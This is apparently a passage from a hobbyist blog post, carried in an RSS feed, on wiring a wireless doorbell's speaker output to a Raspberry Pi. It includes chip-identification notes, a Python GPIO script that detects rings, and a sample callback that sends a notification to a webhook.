<p>To the left of the plug connection, there is an IC labeled <code>LP3773 A3DjC4</code> (or maybe that <code>j</code> is an <code>i</code>, or just a scratch, it's hard to tell). I looked for information about this one first. I found the datasheet of the <code>LP3773A</code> and hoped the name was similar enough for it to be helpful. Unfortunately, most of it was in Chinese, so I had a hard time deciphering it.</p>
<p>In the end, I found the relevant part: for an input voltage between 90V and 265V, its output voltage is 5V. Next, we need a connection point.</p>
<p>My plan was to look up the datasheets of a few other components and trace the &quot;lines&quot; until I found a suitable place. The antenna is in the top right corner, and the IC next to it is most likely in charge of processing the radio signal. Based on the <code>531R 1743</code> label and the little swirly logo, I guessed that the datasheet of the <code>Synoxo SYN531R</code> would be close enough, and found the following pinout in it:</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/syn531r_pinout.png" width="300" height="210" alt="" title="" loading="lazy" />
</p>

<p>The <code>GND</code> and <code>VDD</code> pins right next to <code>ANT</code> are the interesting ones for us. It's a single-layer PCB, so with some light from behind, we can follow their traces.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/pcb_light.jpg" width="660" height="540" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">Let there be light</p>

<p><code>GND</code> connects to the nice big copper area above the IC, but we can't see where <code>VDD</code> goes. Looking at it from different angles, it seemed to go under the IC and come out on the left. Either way, both end up at a connection point (marked <code>C09</code> on the PCB) that may have been meant for a capacitor. No matter: I soldered two wires into the two holes, connected them to 5V, and lo and behold, the doorbell worked.</p>
<h3>Looney Tunes</h3>
<p>In its original state, our doorbell blinks and plays music when someone pushes the button. The LED is built right into the circuit, but the speaker just dangles from the bottom of the PCB on two wires. There is another IC nearby that we can look up. Based on its <code>FR0396-E2</code> label, I found another Chinese datasheet with the diagram we need.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/fr0396-e2_pinout.png" width="660" height="330" alt="" title="" loading="lazy" />
</p>

<p>The speaker is attached to the <code>PWM1</code> and <code>PWM2</code> pins, but we could connect those to a Raspberry Pi instead, for example. The Pi can't handle it as a PWM input, but we don't want to reproduce the melody from the signal anyway. If something changes there (because a melody starts playing), we want to know about it, and that's enough for our purposes.</p>
<h3>Internet of Doorbells</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/rpi.jpg" width="660" height="480" alt="" title="" loading="lazy" />
</p>

<p>It's nice that the board works with 5V, because this way we can power it directly from the Raspberry Pi. I connected one of the speaker outputs to GPIO 23 (BCM numbering, as in the code below). We only need a little Python code to handle the incoming rings.</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> signal
<span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> RPi.GPIO <span class="hljs-keyword">as</span> GPIO

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">signal_handler</span><span class="hljs-params">(sig, frame)</span>:</span>
    GPIO.cleanup()
    sys.exit(<span class="hljs-number">0</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">button_pressed_callback</span><span class="hljs-params">(channel)</span>:</span>
    print(<span class="hljs-string">'Ding-dong'</span>)

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
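    <span class="hljs-comment"># Use Broadcom (BCM) GPIO numbers instead of physical pin numbers</span>
    GPIO.setmode(GPIO.BCM)

    <span class="hljs-comment"># GPIO 23 is wired to one of the speaker outputs; enable the internal pull-up</span>
    GPIO.setup(<span class="hljs-number">23</span>, GPIO.IN, pull_up_down=GPIO.PUD_UP)

    <span class="hljs-comment"># bouncetime is in milliseconds: ignore further edges for 30 s so one melody counts as one ring</span>
    GPIO.add_event_detect(<span class="hljs-number">23</span>, GPIO.RISING, callback=button_pressed_callback, bouncetime=<span class="hljs-number">30000</span>)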

    signal.signal(signal.SIGINT, signal_handler)
    signal.pause()
</code></pre>
<p>Naturally, we can come up with something more clever than <code>print('Ding-dong')</code> when the button is pressed: sending messages, switching relays on or off, or anything your heart desires. Vigilant readers may have noticed the unusually long bounce time of the event detection (30000 ms, i.e. 30 seconds). We need it because the melody can be 10-15 seconds long, and we don't want the edges of a single melody to be handled as separate rings.</p>
<p>And that's it: a dumb wireless doorbell, smartened up. I plan to develop an alternative solution that uses a generic radio receiver, so we don't have to take the indoor unit apart. Maybe in another post. Until then, happy ringing.</p>
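<p>As an example of something more clever than <code>print</code>, here is a sketch of a callback that posts the message to a webhook using only the Python standard library. The endpoint URL and the JSON payload shape are placeholders I made up. Adapt them to whatever notification service you use.</p>
<pre><code class="hljs python">import json
import urllib.request

# Hypothetical endpoint: replace it with your own notification service
WEBHOOK_URL = "https://example.com/doorbell-hook"


def build_notification(message, url=WEBHOOK_URL):
    """Build (but don't send) a JSON POST request carrying the message."""
    body = json.dumps({"text": message}).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def button_pressed_callback(channel):
    """Drop-in replacement for the print() version."""
    try:
        # The timeout keeps a slow network from blocking the callback for long
        with urllib.request.urlopen(build_notification("Ding-dong"), timeout=5) as response:
            response.read()
    except OSError as error:  # URLError and timeouts are both OSError subclasses
        print(f"Could not send notification: {error}")
</code></pre>
<p>Keeping the request construction in a separate function makes it easy to check what would be sent without touching the network or the GPIO pins.</p>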
<h3>Related materials</h3>
<ul>
<li><a href="https://pdf1.alldatasheet.com/datasheet-pdf/view/1146474/LANDP/LP3773A.html">LP3773A datasheet</a></li>
<li><a href="https://datasheet.lcsc.com/szlcsc/1811141751_Synoxo-SYN531R_C77785.pdf">Synoxo SYN531R datasheet</a></li>
<li><a href="http://www.sizeyuan.cn/wp-content/uploads/2018/06/F2-36%E9%A6%968%E5%90%88%E5%BC%A6%E9%97%A8%E9%93%83%E8%8A%AF%E7%89%87SOP8%E5%8A%9F%E8%83%BD%E8%AF%B4%E6%98%8E%E4%B9%A62019.11.6-2.pdf">FR0396-E2 datasheet</a></li>
</ul>

]]></content:encoded>
        </item>
        </channel>
</rss>
